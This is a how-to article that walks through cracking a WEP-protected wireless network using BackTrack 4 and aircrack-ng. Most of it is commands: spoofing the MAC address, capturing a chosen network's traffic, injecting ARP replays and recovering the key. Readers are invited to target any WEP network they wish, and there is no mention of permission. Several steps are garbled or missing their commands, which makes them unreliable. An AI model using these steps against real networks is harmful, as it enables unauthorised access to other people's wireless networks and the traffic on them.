Cracking a wireless network protected with WEP security is very easy as described in How to Protect Your Wireless Network and takes around 5min to achieve. Here you will learn step by step instructions how to crack the WEP key of the wireless network.
Before you begin
- You need to have BackTrack installed and running on VMWare Player. How to Install VMWare & Backtrack 4
- Check if your wireless adapter is compatible with Backtrack 4 from List of compatible adapters
- I am using the Alfa AWUS036H which is a very well known usb wireless adapter because of its good performance and cheap price.
- Make sure that your wireless adapter is plugged into your virtual machine. In VMWare goto the menu “Virtual Machine” -> “Removable Devices” -> “YOUR ADAPTER MUST BE TICKED”
Start Cracking the WEP Password
Launch the Konsole, which is the BackTrack’s built-in command line. It can be found in the lower left corner of the taskbar as showing in the image below.
Run the following command to get a list of your network interfaces:
You may get something like “ath1″, “wlan0”, “wifi0”, or “ra0″…. This is called your interface and you need to substitute it everywhere you see (interface) in the coming commands.
In my case: (interface)=wlan0 (see image below)
Now run the following commands to change the MAC address of your wireless adapter.
airmon-ng stop (interface)
ifconfig (interface) down
--mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)
In my case
airmon-ng stop wlan0
ifconfig wlan0 down
--mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
Don’t forget to change (interface) with its value. Now your MAC address is changed to the fake new address 00:11:22:33:44:55
Now it is time to view the list of available networks and pick one for cracking. Run:
In my case
Wait for some time for all the networks to load then press Ctrl+C to stop the updates. Now choose the wireless network that you wish to crack which has “WEP” encryption in the “ENC” column. “OPN” means that the network is open and you can connect to it without a key, WPA & WPA2 will not work here but you can check How to Crack WPA & WPA2 Wireless with BackTrack 4 running on Windows if you wish to crack a WPA or WPA2 wireless network.
After selecting the network that you want to crack take note of the BSSID, the channel (CH), and ESSID values. In my case: (bssid)=00:1F:9F:4B:B3:DF, (channel)=1, and (essid)=barQ
Now we are going to monitor and record the data passing through that network to a file. Run:
airodump-ng -c (channel) -w (filename)
--bssid (bssid) (interface)
In my case
airodump-ng -c 1 -w barQ
--bssid 00:1F:9F:4B:B3:DF wlan0
Replace (channel), (bssid), and (interface) with their respective values noted before. (filename) can be any name. I usually use the same name of the network which is “barQ” in this case.
The data now is being collected and recorded and you should get an output similar to the window in the background shown in the picture below. Leave that window running.
We now need to create traffic on that network to capture more data faster to speed up the cracking process. Launch a second Konsole window and run:
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
In my case
aireplay-ng -1 0 -a 00:1F:9F:4B:B3:DF -h 00:11:22:33:44:55 -e barQ wlan0
You should get the message “Association successful :-)” which means that you are authenticated and ready to start generating traffic on that network to speed up the process. Run:
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
In my case
aireplay-ng -3 -b 00:1F:9F:4B:B3:DF -h 00:11:22:33:44:55 wlan0
Now it is time to WAIT. We are creating router traffic to capture more data which will help us speed up our cracking process. After few minutes, the window might start showing “Read XXXXX packets” and might not, but the important thing to keep an eye on is the “#Data” value in the first window. We need it to go above “10,000”.
Wait until the “#Data” reaches a value above 10,000 which should take less than 2 minutes. you might need more than 10,000 depending on the security of the network but most of the time 10,000 should be enough.
Displaying the Key
Once you have collected more than 10,000 Data launch a third Konsole window and enter:
aircrack-ng -b (bssid) (filename-01.cap)
In my case
aircrack-ng -b 00:1F:9F:4B:B3:DF barQ-01.cap
The filename should be what you used in (filename) + “-01.cap”, if you are not sure about the (filename) enter “ls” to see list of all the files.
If you don’t have enough data then aircrack will ask you to collect more data. If you do then you should see something like:
The WEP key is what you see besides “KEY FOUND!” inside the brackets without the colons “:” which is of the format “XXXXXXXXXX”
Note: The WEP key is the hex equivalent of the pass phrase that you type to connect to the wireless network. Entering the WEP key is more than enough to get you connected. The WEP ASCII password might be displayed if you collect more packets.
We have seen how easy it is to crack a WEP wireless network. This should give you the alert to change the security of your wireless network if it is still WEP.
Feel free to ask questions or let me know if I have missed something by leaving a comment below.